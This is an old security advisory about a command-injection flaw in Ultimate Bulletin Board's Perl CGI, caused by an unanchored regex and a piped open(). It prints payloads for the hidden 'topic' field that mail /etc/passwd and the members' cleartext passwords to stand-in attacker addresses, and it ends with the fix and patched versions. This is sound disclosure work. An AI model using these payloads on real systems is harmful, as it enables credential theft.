COMMAND
UltimateBB
SYSTEMS AFFECTED
Systems with UltimateBB
PROBLEM
Sergei A. Golubchik found following. Writing cgi scripts in perl
is simple. It's also rather safe, providing authors follow very
simple instructions. But they don't. Browsing some site, Sergei
found that their forums were based not on home- made scripts, but
rather commercial software product. They use commercial package
photoads. Let's look what that Ultimate Bulletin Board by Infopop
is.
After 10-minutes grepping we find these lines:
ubb_library.pl:901-902
if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");
(notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think
about while writing it ? Girls ?) And the $ThreadFile takes its
value directly from the hidden (hmm!) field `topic'.
When you fill the form with
topic='012345.ubb|mail hacker@evil.com </etc/passwd|'
It will happily give you /etc/passwd. And
topic='012345.ubb|cat Members/*|mail hacker@evil.org|'
shows all users of bulletin board, and their passwords too (in
cleartext!). So one should only open "reply" form in the forum,
save it to disk, and set topic field to whatever he want. And
this stupid UBB (at least freeware version) doesn't keep the logs
(unless, so-called, hacklog, used when the condition above is not
met).
This works on the full version also... Little different syntax:
topic=012345.cgi|cat%20../Members/*|mail hacker@evil.org|
(note the ../ on the Members. You have to go up a directory to
get the file. Maybe you could stop it via simple folder
permissions??)
SOLUTION
The fix is obvious. But the rule of the thumb is "do not use
magic perl open". At least in cgi scripts. If you want to open
regular file, sysopen does the trick as well.
The latest versions of the UBB (Freeware version '2000', and a
new release of licensed version 5.43d) contain fixes for this bug
as of 14th Feb 2000. The fix has also been posted in this thread:
http://www.scriptkeeper.com/ubb/Forum16/HTML/000814.html